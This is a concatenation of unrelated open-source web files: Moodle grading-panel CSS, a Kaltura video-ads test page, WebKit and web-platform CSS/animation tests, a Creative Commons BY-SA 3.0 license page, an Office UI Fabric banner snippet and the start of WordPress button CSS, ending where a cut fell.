.path-mod-assign [data-region="grade-panel"] #id_attemptsettings > legend {
font-size: 18px;
font-weight: 500;
line-height: 40px;
border-bottom: 0;
margin-bottom: 10px;
}
.path-mod-assign [data-region="grade-panel"] #id_attemptsettings .fcontainer {
display: table;
width: 100%;
padding-left: 5px;
padding-right: 5px;
margin-bottom: 10px;
box-sizing: border-box;
}
.path-mod-assign [data-region="grade-panel"] .mform #id_attemptsettings .fitem {
display: table-row;
}
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) #id_attemptsettings .fitem .fitemtitle,
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) #id_attemptsettings .fitem .felement {
display: table-cell;
float: none;
border-top: 1px solid #ddd;
padding: 8px 0;
}
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) #id_attemptsettings .fitem:last-of-type .fitemtitle,
.path-mod-assign #page-content [data-region="grade-panel"] .mform:not(.unresponsive) #id_attemptsettings .fitem:last-of-type .felement {
border-bottom: 1px solid #ddd;
}
.path-mod-assign [data-region="grade-panel"] #id_attemptsettings .fitem .fstaticlabel,
.path-mod-assign [data-region="grade-panel"] .mform:not(.unresponsive) #id_attemptsettings .fitem .fitemtitle label {
font-weight: 400;
}
.path-mod-assign [data-region="grade-panel"] .mform:not(.unresponsive) #id_attemptsettings .fitem .felement select {
margin-bottom: 0;
}
.path-mod-assign [data-region="grade-panel"] [data-region="attempt-chooser"] {
margin-bottom: 10px;
vertical-align: text-bottom;
}
/***** End attempt settings *****/
.path-mod-assign [data-region="grade-actions-panel"] {
border-top: 1px solid #ddd;
position: absolute;
bottom: 0;
left: 0;
width: 100%;
height: 60px;
}
.path-mod-assign [data-region="grade-actions"] {
padding: 1em;
text-align: center;
}
.path-mod-assign [data-region="submissions-list"] {
text-align: inherit;
}
.path-mod-assign [data-region="submissions-list"] label.radio input {
margin-top: 4px;
min-width: inherit;
}
.path-mod-assign [data-region="overlay"] {
display: none;
z-index: 100;
position: absolute;
top: 0em;
left: 0;
width: 100%;
overflow: auto;
bottom: 0em;
background-color: #ddd;
opacity: 0.4;
padding-top: 4em;
text-align: center;
}
@media (max-width: 767px) {
.path-mod-assign.pagelayout-embedded {
overflow: auto;
}
.path-mod-assign [data-region="assignment-info"] {
border-bottom: 1px solid #ddd;
padding-bottom: 5px;
}
.path-mod-assign .page-context-header .page-header-headings {
margin-top: 13px;
}
.path-mod-assign [data-region="grading-navigation-panel"],
.path-mod-assign [data-region="review-panel"],
.path-mod-assign [data-region="grade-panel"],
.path-mod-assign [data-region="grade-actions-panel"] {
position: inherit;
width: 100%;
top: 0;
left: 0;
overflow: auto;
height: auto;
margin-bottom: 1em;
}
.path-mod-assign [data-region="grading-navigation"] {
padding: 0;
text-align: center;
}
.path-mod-assign [data-region="grade-panel"] {
margin-bottom: 2em;
}
.path-mod-assign [data-region="grade-panel"] [data-region="popout-button"] {
display: none;
}
.path-mod-assign [data-region="review-panel"] .pageheader {
border-right: none;
}
.path-mod-assign.pagelayout-popup {
overflow: inherit;
}
.path-mod-assign [data-region="grading-navigation"] [data-region="user-info"] {
text-align: left;
width: auto;
display: inline-block;
margin: 0 auto;
}
.path-mod-assign [data-region="user-selector"] .alignment {
float: none;
margin: 0 auto 10px;
}
}
/** Start of CSS to make forms vertical in the grading panel (taken from theme/bootstrapbase/less/moodle/forms.less). */
.path-mod-assign [data-region="grade-panel"] .mform .fitem .fitemtitle {
display: block;
margin-top: 4px;
margin-bottom: 4px;
text-align: left;
width: 100%;
}
.path-mod-assign [data-region="grade-panel"] .mform .fitem .felement {
margin-left: 0;
width: 100%;
float: left;
padding-left: 0;
padding-right: 0;
}
.path-mod-assign [data-region="grade-panel"] .mform .fitem .fstatic:empty {
display: none;
}
.path-mod-assign [data-region="grade-panel"] .mform .fitem .fcheckbox > span,
.path-mod-assign [data-region="grade-panel"] .mform .fitem .fradio > span,
.path-mod-assign [data-region="grade-panel"] .mform .fitem .fgroup > span {
margin-top: 4px;
}
.path-mod-assign [data-region="grade-panel"] .mform .femptylabel .fitemtitle {
display: inline-block;
width: auto;
margin-right: 8px;
}
.path-mod-assign [data-region="grade-panel"] .mform .femptylabel .felement {
display: inline-block;
margin-top: 4px;
padding-top: 5px;
width: auto;
}
.path-mod-assign [data-region="grade-panel"] .mform .fitem_fcheckbox .fitemtitle,
.path-mod-assign [data-region="grade-panel"] .mform .fitem_fcheckbox .felement {
display: inline-block;
width: auto;
}
.path-mod-assign [data-region="grade-panel"] .mform .fitem_fcheckbox .felement {
padding: 6px;
}
.dir-rtl.path-mod-assign [data-region="grade-panel"] .mform .femptylabel .fitemtitle {
margin-right: 0px;
margin-left: 8px;
}
.dir-rtl.path-mod-assign [data-region="grade-panel"] .mform .fitem .fitemtitle {
text-align: right;
}
.dir-rtl.path-mod-assign [data-region="grade-panel"] .mform .fitem .felement {
margin-right: 0;
float: right;
padding-right: 0;
padding-left: 0;
}
.dir-rtl.path-mod-assign [data-region="grade-panel"] .mform .fitem_checkbox .felement {
float: right;
}
/** End of CSS to make forms vertical in the grading panel (taken from theme/bootstrapbase/less/moodle/forms.less). */
/** Styles to fix base theme **/
.path-mod-assign #page,
.path-mod-assign #page-content {
position: inherit;
}
/** End of base fixes **/
|
modules/KalturaSupport/tests/CuePointsAds.html
|
FlixMaster/mwEmbed
|
<!DOCTYPE HTML>
<html>
<head>
<title>Cue Points VAST Ads test</title>
<script type="text/javascript" src="../../../mwEmbedLoader.php"></script>
<script type="text/javascript" src="../../../docs/js/doc-bootstrap.js"></script>
<script type="text/javascript">
</script>
<!-- qunit-kaltura must come after qunit-bootstrap.js and after mwEmbedLoader.php and after any jsCallbackReady stuff-->
<script type="text/javascript" src="resources/qunit-kaltura-bootstrap.js"></script>
</head>
<body>
<h2>Cue Points VAST Ads test</h2>
<p>This entry has 3 cue points:</p>
<ul>
<li>00:00 - Preroll</li>
<li>00:20 - Midroll</li>
<li>02:38 - Postroll</li>
</ul>
<br /><br />
<div id="myVideoTarget" style="width:400px;height:330px;"></div>
<script>
kWidget.embed({
'targetId': 'myVideoTarget',
'wid': '_423851',
'uiconf_id' : '6178231',
'entry_id' : '1_9t28c1xt',
'flashvars':{
'externalInterfaceDisabled' : false,
}
});
</script>
</body>
</html>
|
third_party/WebKit/LayoutTests/fast/css/invalidation/targeted-class-host-pseudo.html
|
vadimtk/chrome4sdp
|
<!DOCTYPE html>
<script src="../../../resources/js-test.js"></script>
<div id="host1"></div>
<div id="host2"></div>
<div id="host3" class="c3"></div>
<div id="host4"></div>
<script>
description("Check that targeted class invalidation works with the :host pseudo class.");
// Create shadow trees
var host1 = document.getElementById("host1");
host1.createShadowRoot().innerHTML = "<style>:host(.c1) { background-color: green }</style><div></div><div></div><div></div><div></div><div></div>";
var host2 = document.getElementById("host2");
host2.createShadowRoot().innerHTML = '<style>:host(.c2) .inner { background-color: green }</style><div></div><div></div><div></div><div><span id="inner" class="inner"></span></div>';
var host3 = document.getElementById("host3");
host3.createShadowRoot().innerHTML = "<style>:host(#host3:not(.c3)) { background-color: green }</style><div></div><div></div><div></div><div></div>";
var host4 = document.getElementById("host4");
host4.createShadowRoot().innerHTML = "<style>:host(.nomatch, .c4) { background-color: green }</style><div></div><div></div><div></div><div></div>";
var transparent = "rgba(0, 0, 0, 0)";
var green = "rgb(0, 128, 0)";
var inner = host2.shadowRoot.getElementById("inner");
shouldBe("getComputedStyle(host1, null).backgroundColor", "transparent");
shouldBe("getComputedStyle(inner, null).backgroundColor", "transparent");
shouldBe("getComputedStyle(host3, null).backgroundColor", "transparent");
shouldBe("getComputedStyle(host4, null).backgroundColor", "transparent");
document.body.offsetLeft; // force style recalc.
host1.className = "c1";
if (window.internals)
shouldBe("internals.updateStyleAndReturnAffectedElementCount()", "1");
shouldBe("getComputedStyle(host1, null).backgroundColor", "green");
document.body.offsetLeft; // force style recalc.
host2.className = "c2";
if (window.internals)
shouldBe("internals.updateStyleAndReturnAffectedElementCount()", "2");
shouldBe("getComputedStyle(inner, null).backgroundColor", "green");
document.body.offsetLeft; // force style recalc.
host3.className = "";
if (window.internals)
shouldBe("internals.updateStyleAndReturnAffectedElementCount()", "1");
shouldBe("getComputedStyle(host3, null).backgroundColor", "green");
document.body.offsetLeft; // force style recalc.
host4.className = "c4";
if (window.internals)
shouldBe("internals.updateStyleAndReturnAffectedElementCount()", "1");
shouldBe("getComputedStyle(host4, null).backgroundColor", "green");
</script>
|
tests/wpt/web-platform-tests/web-animations/interfaces/KeyframeEffect/processing-a-keyframes-argument.html
|
Glorf/servo
|
<!DOCTYPE html>
<meta charset=utf-8>
<title>KeyframeEffectReadOnly constructor tests</title>
<link rel="help" href="https://w3c.github.io/web-animations/#processing-a-keyframes-argument">
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<script src="../../testcommon.js"></script>
<body>
<div id="log"></div>
<div id="target"></div>
<script>
'use strict';
// Test the "process a keyframe-like object" procedure.
//
// This file only tests the KeyframeEffectReadOnly constructor since it is
// assumed that the implementation of the KeyframeEffect constructor,
// Animatable.animate() method, and KeyframeEffect.setKeyframes() method will
// all share common machinery and it is not necessary to test each method.
// Test that only animatable properties are accessed
var gNonAnimatableProps = [
'animation', // Shorthands where all the longhand sub-properties are not
// animatable, are also not animatable.
'animationDelay',
'animationDirection',
'animationDuration',
'animationFillMode',
'animationIterationCount',
'animationName',
'animationPlayState',
'animationTimingFunction',
'transition',
'transitionDelay',
'transitionDuration',
'transitionProperty',
'transitionTimingFunction',
'display',
'unsupportedProperty',
];
function TestKeyframe(testProp) {
var _propAccessCount = 0;
Object.defineProperty(this, testProp, {
get: function() { _propAccessCount++; },
enumerable: true
});
Object.defineProperty(this, 'propAccessCount', {
get: function() { return _propAccessCount; }
});
}
function GetTestKeyframeSequence(testProp) {
return [ new TestKeyframe(testProp) ]
}
gNonAnimatableProps.forEach(function(prop) {
test(function(t) {
var testKeyframe = new TestKeyframe(prop);
new KeyframeEffectReadOnly(null, testKeyframe);
assert_equals(testKeyframe.propAccessCount, 0, 'Accessor not called');
}, 'non-animatable property \'' + prop + '\' is not accessed when using'
+ ' a property-indexed keyframe object');
});
gNonAnimatableProps.forEach(function(prop) {
test(function(t) {
var testKeyframes = GetTestKeyframeSequence(prop);
new KeyframeEffectReadOnly(null, testKeyframes);
assert_equals(testKeyframes[0].propAccessCount, 0, 'Accessor not called');
}, 'non-animatable property \'' + prop + '\' is not accessed when using'
+ ' a keyframe sequence');
});
// FIXME: Test that non-enumerable properties are not accessed
// FIXME: Test that properties are accessed in ascending order by Unicode
// codepoint
// (There is an existing test for this in
// keyframe-effect/constructor.html that should be moved here.)
</script>
|
third_party/get_auth_ns/LICENSE.html
|
rogers0/namebench
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content=
"HTML Tidy for Linux/x86 (vers 1 September 2005), see www.w3.org" />
<title>Creative Commons Legal Code</title>
<meta http-equiv="content-type" content=
"text/html; charset=utf-8" />
<link rel="stylesheet" type="text/css" href=
"http://creativecommons.org/includes/deed3.css" media="screen" />
<link rel="stylesheet" type="text/css" href=
"http://creativecommons.org/includes/deed3-print.css" media=
"print" />
<!--[if lt IE 7]><link rel="stylesheet" type="text/css" href="http://creativecommons.org/includes/deed3-ie.css" media="screen" /><![endif]-->
<script type="text/javascript" src=
"http://creativecommons.org/includes/errata.js">
</script>
</head>
<body>
<p align="center" id="header"><a href=
"http://creativecommons.org/">Creative Commons</a></p>
<div id="deed" class="green">
<div id="deed-head">
<div id="cc-logo">
<img src=
"http://creativecommons.org/images/deed/cc-logo.jpg" alt=
"" />
</div>
<h1><span>Creative Commons Legal Code</span></h1>
<div id="deed-license">
<h2>Attribution-ShareAlike 3.0 Unported</h2>
</div>
</div>
<div id="deed-main">
<div id="deed-main-content">
<img src=
"http://creativecommons.org/images/international/unported.png"
alt="" />
<blockquote>
CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES
NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS LICENSE
DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE
COMMONS PROVIDES THIS INFORMATION ON AN "AS-IS" BASIS.
CREATIVE COMMONS MAKES NO WARRANTIES REGARDING THE
INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES
RESULTING FROM ITS USE.
</blockquote>
<h3><em>License</em></h3>
<p>THE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS
OF THIS CREATIVE COMMONS PUBLIC LICENSE ("CCPL" OR
"LICENSE"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR OTHER
APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS
AUTHORIZED UNDER THIS LICENSE OR COPYRIGHT LAW IS
PROHIBITED.</p>
<p>BY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU
ACCEPT AND AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE.
TO THE EXTENT THIS LICENSE MAY BE CONSIDERED TO BE A
CONTRACT, THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE
IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND
CONDITIONS.</p>
<p><strong>1. Definitions</strong></p>
<ol type="a">
<li><strong>"Adaptation"</strong> means a work based upon
the Work, or upon the Work and other pre-existing works,
such as a translation, adaptation, derivative work,
arrangement of music or other alterations of a literary
or artistic work, or phonogram or performance and
includes cinematographic adaptations or any other form in
which the Work may be recast, transformed, or adapted
including in any form recognizably derived from the
original, except that a work that constitutes a
Collection will not be considered an Adaptation for the
purpose of this License. For the avoidance of doubt,
where the Work is a musical work, performance or
phonogram, the synchronization of the Work in
timed-relation with a moving image ("synching") will be
considered an Adaptation for the purpose of this
License.</li>
<li><strong>"Collection"</strong> means a collection of
literary or artistic works, such as encyclopedias and
anthologies, or performances, phonograms or broadcasts,
or other works or subject matter other than works listed
in Section 1(f) below, which, by reason of the selection
and arrangement of their contents, constitute
intellectual creations, in which the Work is included in
its entirety in unmodified form along with one or more
other contributions, each constituting separate and
independent works in themselves, which together are
assembled into a collective whole. A work that
constitutes a Collection will not be considered an
Adaptation (as defined below) for the purposes of this
License.</li>
<li><strong>"Creative Commons Compatible
License"</strong> means a license that is listed at
http://creativecommons.org/compatiblelicenses that has
been approved by Creative Commons as being essentially
equivalent to this License, including, at a minimum,
because that license: (i) contains terms that have the
same purpose, meaning and effect as the License Elements
of this License; and, (ii) explicitly permits the
relicensing of adaptations of works made available under
that license under this License or a Creative Commons
jurisdiction license with the same License Elements as
this License.</li>
<li><strong>"Distribute"</strong> means to make available
to the public the original and copies of the Work or
Adaptation, as appropriate, through sale or other
transfer of ownership.</li>
<li><strong>"License Elements"</strong> means the
following high-level license attributes as selected by
Licensor and indicated in the title of this License:
Attribution, ShareAlike.</li>
<li><strong>"Licensor"</strong> means the individual,
individuals, entity or entities that offer(s) the Work
under the terms of this License.</li>
<li><strong>"Original Author"</strong> means, in the case
of a literary or artistic work, the individual,
individuals, entity or entities who created the Work or
if no individual or entity can be identified, the
publisher; and in addition (i) in the case of a
performance the actors, singers, musicians, dancers, and
other persons who act, sing, deliver, declaim, play in,
interpret or otherwise perform literary or artistic works
or expressions of folklore; (ii) in the case of a
phonogram the producer being the person or legal entity
who first fixes the sounds of a performance or other
sounds; and, (iii) in the case of broadcasts, the
organization that transmits the broadcast.</li>
<li><strong>"Work"</strong> means the literary and/or
artistic work offered under the terms of this License
including without limitation any production in the
literary, scientific and artistic domain, whatever may be
the mode or form of its expression including digital
form, such as a book, pamphlet and other writing; a
lecture, address, sermon or other work of the same
nature; a dramatic or dramatico-musical work; a
choreographic work or entertainment in dumb show; a
musical composition with or without words; a
cinematographic work to which are assimilated works
expressed by a process analogous to cinematography; a
work of drawing, painting, architecture, sculpture,
engraving or lithography; a photographic work to which
are assimilated works expressed by a process analogous to
photography; a work of applied art; an illustration, map,
plan, sketch or three-dimensional work relative to
geography, topography, architecture or science; a
performance; a broadcast; a phonogram; a compilation of
data to the extent it is protected as a copyrightable
work; or a work performed by a variety or circus
performer to the extent it is not otherwise considered a
literary or artistic work.</li>
<li><strong>"You"</strong> means an individual or entity
exercising rights under this License who has not
previously violated the terms of this License with
respect to the Work, or who has received express
permission from the Licensor to exercise rights under
this License despite a previous violation.</li>
<li><strong>"Publicly Perform"</strong> means to perform
public recitations of the Work and to communicate to the
public those public recitations, by any means or process,
including by wire or wireless means or public digital
performances; to make available to the public Works in
such a way that members of the public may access these
Works from a place and at a place individually chosen by
them; to perform the Work to the public by any means or
process and the communication to the public of the
performances of the Work, including by public digital
performance; to broadcast and rebroadcast the Work by any
means including signs, sounds or images.</li>
<li><strong>"Reproduce"</strong> means to make copies of
the Work by any means including without limitation by
sound or visual recordings and the right of fixation and
reproducing fixations of the Work, including storage of a
protected performance or phonogram in digital form or
other electronic medium.</li>
</ol>
<p><strong>2. Fair Dealing Rights.</strong> Nothing in this
License is intended to reduce, limit, or restrict any uses
free from copyright or rights arising from limitations or
exceptions that are provided for in connection with the
copyright protection under copyright law or other
applicable laws.</p>
<p><strong>3. License Grant.</strong> Subject to the terms
and conditions of this License, Licensor hereby grants You
a worldwide, royalty-free, non-exclusive, perpetual (for
the duration of the applicable copyright) license to
exercise the rights in the Work as stated below:</p>
<ol type="a">
<li>to Reproduce the Work, to incorporate the Work into
one or more Collections, and to Reproduce the Work as
incorporated in the Collections;</li>
<li>to create and Reproduce Adaptations provided that any
such Adaptation, including any translation in any medium,
takes reasonable steps to clearly label, demarcate or
otherwise identify that changes were made to the original
Work. For example, a translation could be marked "The
original work was translated from English to Spanish," or
a modification could indicate "The original work has been
modified.";</li>
<li>to Distribute and Publicly Perform the Work including
as incorporated in Collections; and,</li>
<li>to Distribute and Publicly Perform Adaptations.</li>
<li>
<p>For the avoidance of doubt:</p>
<ol type="i">
<li><strong>Non-waivable Compulsory License
Schemes</strong>. In those jurisdictions in which the
right to collect royalties through any statutory or
compulsory licensing scheme cannot be waived, the
Licensor reserves the exclusive right to collect such
royalties for any exercise by You of the rights
granted under this License;</li>
<li><strong>Waivable Compulsory License
Schemes</strong>. In those jurisdictions in which the
right to collect royalties through any statutory or
compulsory licensing scheme can be waived, the
Licensor waives the exclusive right to collect such
royalties for any exercise by You of the rights
granted under this License; and,</li>
<li><strong>Voluntary License Schemes</strong>. The
Licensor waives the right to collect royalties,
whether individually or, in the event that the
Licensor is a member of a collecting society that
administers voluntary licensing schemes, via that
society, from any exercise by You of the rights
granted under this License.</li>
</ol>
</li>
</ol>
<p>The above rights may be exercised in all media and
formats whether now known or hereafter devised. The above
rights include the right to make such modifications as are
technically necessary to exercise the rights in other media
and formats. Subject to Section 8(f), all rights not
expressly granted by Licensor are hereby reserved.</p>
<p><strong>4. Restrictions.</strong> The license granted in
Section 3 above is expressly made subject to and limited by
the following restrictions:</p>
<ol type="a">
<li>You may Distribute or Publicly Perform the Work only
under the terms of this License. You must include a copy
of, or the Uniform Resource Identifier (URI) for, this
License with every copy of the Work You Distribute or
Publicly Perform. You may not offer or impose any terms
on the Work that restrict the terms of this License or
the ability of the recipient of the Work to exercise the
rights granted to that recipient under the terms of the
License. You may not sublicense the Work. You must keep
intact all notices that refer to this License and to the
disclaimer of warranties with every copy of the Work You
Distribute or Publicly Perform. When You Distribute or
Publicly Perform the Work, You may not impose any
effective technological measures on the Work that
restrict the ability of a recipient of the Work from You
to exercise the rights granted to that recipient under
the terms of the License. This Section 4(a) applies to
the Work as incorporated in a Collection, but this does
not require the Collection apart from the Work itself to
be made subject to the terms of this License. If You
create a Collection, upon notice from any Licensor You
must, to the extent practicable, remove from the
Collection any credit as required by Section 4(c), as
requested. If You create an Adaptation, upon notice from
any Licensor You must, to the extent practicable, remove
from the Adaptation any credit as required by Section
4(c), as requested.</li>
<li>You may Distribute or Publicly Perform an Adaptation
only under the terms of: (i) this License; (ii) a later
version of this License with the same License Elements as
this License; (iii) a Creative Commons jurisdiction
license (either this or a later license version) that
contains the same License Elements as this License (e.g.,
Attribution-ShareAlike 3.0 US)); (iv) a Creative Commons
Compatible License. If you license the Adaptation under
one of the licenses mentioned in (iv), you must comply
with the terms of that license. If you license the
Adaptation under the terms of any of the licenses
mentioned in (i), (ii) or (iii) (the "Applicable
License"), you must comply with the terms of the
Applicable License generally and the following
provisions: (I) You must include a copy of, or the URI
for, the Applicable License with every copy of each
Adaptation You Distribute or Publicly Perform; (II) You
may not offer or impose any terms on the Adaptation that
restrict the terms of the Applicable License or the
ability of the recipient of the Adaptation to exercise
the rights granted to that recipient under the terms of
the Applicable License; (III) You must keep intact all
notices that refer to the Applicable License and to the
disclaimer of warranties with every copy of the Work as
included in the Adaptation You Distribute or Publicly
Perform; (IV) when You Distribute or Publicly Perform the
Adaptation, You may not impose any effective
technological measures on the Adaptation that restrict
the ability of a recipient of the Adaptation from You to
exercise the rights granted to that recipient under the
terms of the Applicable License. This Section 4(b)
applies to the Adaptation as incorporated in a
Collection, but this does not require the Collection
apart from the Adaptation itself to be made subject to
the terms of the Applicable License.</li>
<li>If You Distribute, or Publicly Perform the Work or
any Adaptations or Collections, You must, unless a
request has been made pursuant to Section 4(a), keep
intact all copyright notices for the Work and provide,
reasonable to the medium or means You are utilizing: (i)
the name of the Original Author (or pseudonym, if
applicable) if supplied, and/or if the Original Author
and/or Licensor designate another party or parties (e.g.,
a sponsor institute, publishing entity, journal) for
attribution ("Attribution Parties") in Licensor's
copyright notice, terms of service or by other reasonable
means, the name of such party or parties; (ii) the title
of the Work if supplied; (iii) to the extent reasonably
practicable, the URI, if any, that Licensor specifies to
be associated with the Work, unless such URI does not
refer to the copyright notice or licensing information
for the Work; and (iv) , consistent with Ssection 3(b),
in the case of an Adaptation, a credit identifying the
use of the Work in the Adaptation (e.g., "French
translation of the Work by Original Author," or
"Screenplay based on original Work by Original Author").
The credit required by this Section 4(c) may be
implemented in any reasonable manner; provided, however,
that in the case of a Adaptation or Collection, at a
minimum such credit will appear, if a credit for all
contributing authors of the Adaptation or Collection
appears, then as part of these credits and in a manner at
least as prominent as the credits for the other
contributing authors. For the avoidance of doubt, You may
only use the credit required by this Section for the
purpose of attribution in the manner set out above and,
by exercising Your rights under this License, You may not
implicitly or explicitly assert or imply any connection
with, sponsorship or endorsement by the Original Author,
Licensor and/or Attribution Parties, as appropriate, of
You or Your use of the Work, without the separate,
express prior written permission of the Original Author,
Licensor and/or Attribution Parties.</li>
<li>Except as otherwise agreed in writing by the Licensor
or as may be otherwise permitted by applicable law, if
You Reproduce, Distribute or Publicly Perform the Work
either by itself or as part of any Adaptations or
Collections, You must not distort, mutilate, modify or
take other derogatory action in relation to the Work
which would be prejudicial to the Original Author's honor
or reputation. Licensor agrees that in those
jurisdictions (e.g. Japan), in which any exercise of the
right granted in Section 3(b) of this License (the right
to make Adaptations) would be deemed to be a distortion,
mutilation, modification or other derogatory action
prejudicial to the Original Author's honor and
reputation, the Licensor will waive or not assert, as
appropriate, this Section, to the fullest extent
permitted by the applicable national law, to enable You
to reasonably exercise Your right under Section 3(b) of
this License (right to make Adaptations) but not
otherwise.</li>
</ol>
<p><strong>5. Representations, Warranties and
Disclaimer</strong></p>
<p>UNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN
WRITING, LICENSOR OFFERS THE WORK AS-IS AND MAKES NO
REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING THE
WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING,
WITHOUT LIMITATION, WARRANTIES OF TITLE, MERCHANTIBILITY,
FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT, OR THE
ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE
PRESENCE OF ABSENCE OF ERRORS, WHETHER OR NOT DISCOVERABLE.
SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF IMPLIED
WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.</p>
<p><strong>6. Limitation on Liability.</strong> EXCEPT TO
THE EXTENT REQUIRED BY APPLICABLE LAW, IN NO EVENT WILL
LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY
SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY
DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK,
EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.</p>
<p><strong>7. Termination</strong></p>
<ol type="a">
<li>This License and the rights granted hereunder will
terminate automatically upon any breach by You of the
terms of this License. Individuals or entities who have
received Adaptations or Collections from You under this
License, however, will not have their licenses terminated
provided such individuals or entities remain in full
compliance with those licenses. Sections 1, 2, 5, 6, 7,
and 8 will survive any termination of this License.</li>
<li>Subject to the above terms and conditions, the
license granted here is perpetual (for the duration of
the applicable copyright in the Work). Notwithstanding
the above, Licensor reserves the right to release the
Work under different license terms or to stop
distributing the Work at any time; provided, however that
any such election will not serve to withdraw this License
(or any other license that has been, or is required to
be, granted under the terms of this License), and this
License will continue in full force and effect unless
terminated as stated above.</li>
</ol>
<p><strong>8. Miscellaneous</strong></p>
<ol type="a">
<li>Each time You Distribute or Publicly Perform the Work
or a Collection, the Licensor offers to the recipient a
license to the Work on the same terms and conditions as
the license granted to You under this License.</li>
<li>Each time You Distribute or Publicly Perform an
Adaptation, Licensor offers to the recipient a license to
the original Work on the same terms and conditions as the
license granted to You under this License.</li>
<li>If any provision of this License is invalid or
unenforceable under applicable law, it shall not affect
the validity or enforceability of the remainder of the
terms of this License, and without further action by the
parties to this agreement, such provision shall be
reformed to the minimum extent necessary to make such
provision valid and enforceable.</li>
<li>No term or provision of this License shall be deemed
waived and no breach consented to unless such waiver or
consent shall be in writing and signed by the party to be
charged with such waiver or consent.</li>
<li>This License constitutes the entire agreement between
the parties with respect to the Work licensed here. There
are no understandings, agreements or representations with
respect to the Work not specified here. Licensor shall
not be bound by any additional provisions that may appear
in any communication from You. This License may not be
modified without the mutual written agreement of the
Licensor and You.</li>
<li>The rights granted under, and the subject matter
referenced, in this License were drafted utilizing the
terminology of the Berne Convention for the Protection of
Literary and Artistic Works (as amended on September 28,
1979), the Rome Convention of 1961, the WIPO Copyright
Treaty of 1996, the WIPO Performances and Phonograms
Treaty of 1996 and the Universal Copyright Convention (as
revised on July 24, 1971). These rights and subject
matter take effect in the relevant jurisdiction in which
the License terms are sought to be enforced according to
the corresponding provisions of the implementation of
those treaty provisions in the applicable national law.
If the standard suite of rights granted under applicable
copyright law includes additional rights not granted
under this License, such additional rights are deemed to
be included in the License; this License is not intended
to restrict the license of any rights under applicable
law.</li>
</ol>
<!-- BREAKOUT FOR CC NOTICE. NOT A PART OF THE LICENSE -->
<blockquote>
<h3>Creative Commons Notice</h3>
<p>Creative Commons is not a party to this License, and
makes no warranty whatsoever in connection with the Work.
Creative Commons will not be liable to You or any party
on any legal theory for any damages whatsoever, including
without limitation any general, special, incidental or
consequential damages arising in connection to this
license. Notwithstanding the foregoing two (2) sentences,
if Creative Commons has expressly identified itself as
the Licensor hereunder, it shall have all rights and
obligations of Licensor.</p>
<p>Except for the limited purpose of indicating to the
public that the Work is licensed under the CCPL, Creative
Commons does not authorize the use by either party of the
trademark "Creative Commons" or any related trademark or
logo of Creative Commons without the prior written
consent of Creative Commons. Any permitted use will be in
compliance with Creative Commons' then-current trademark
usage guidelines, as may be published on its website or
otherwise made available upon request from time to time.
For the avoidance of doubt, this trademark restriction
does not form part of the License.</p>
<p>Creative Commons may be contacted at <a href=
"http://creativecommons.org/">http://creativecommons.org/</a>.</p>
</blockquote><!-- END CC NOTICE -->
</div>
</div>
<div id="deed-foot">
<p id="footer"><a href="./">« Back to Commons Deed</a></p>
</div>
</div>
</body>
</html>
|
src/components/MessageBanner/MessageBanner.html
|
zkoehne/Office-UI-Fabric
|
<!-- Copyright (c) Microsoft. All rights reserved. Licensed under the MIT license. See LICENSE in the project root for license information. -->
<div class="ms-MessageBanner">
<div class="ms-MessageBanner-content">
<div class="ms-MessageBanner-text">
<div class="ms-MessageBanner-clipper">
You've reached your total storage on OneDrive. Please upgrade your storage plan if you need more storage.
</div>
</div>
<button class="ms-MessageBanner-expand">
<i class="ms-Icon ms-Icon--chevronsDown"></i>
</button>
<div class="ms-MessageBanner-action">
<button class="ms-Button ms-Button--primary ms-fontColor-neutralLight">Get More Storage</button>
</div>
</div>
<button class="ms-MessageBanner-close">
<i class="ms-Icon ms-Icon--x"></i>
</button>
</div>
|
wp-includes/css/buttons.css
|
pcutler/stoneopen
|
/* ----------------------------------------------------------------------------
NOTE: If you edit this file, you should make sure that the CSS rules for
buttons in the following files are updated.
* jquery-ui-dialog.css
* editor.css
WordPress-style Buttons
=======================
Create a button by adding the `.button` class to an element. For backward
compatibility, we support several other classes (such as `.button-secondary`),
but these will *not* work with the stackable classes described below.
Button Styles
-------------
To display a primary button style, add the `.button-primary` class to a button.
Button Sizes
------------
Adjust a button's size by adding the `.button-large` or `.button-small` class.
Button States
-------------
Lock the state of a button by adding the name of the pseudoclass as
an actual class (e.g. `.hover` for `:hover`).
TABLE OF CONTENTS:
------------------
1.0 - Button Layouts
2.0 - Default Button Style
3.0 - Primary Button Style
4.0 - Button Groups
5.0 - Responsive Button Styles
---------------------------------------------------------------------------- */
/* ----------------------------------------------------------------------------
1.0 - Button Layouts
---------------------------------------------------------------------------- */
.wp-core-ui .button,
.wp-core-ui .button-primary,
.wp-core-ui .button-secondary {
display: inline-block;
text-decoration: none;
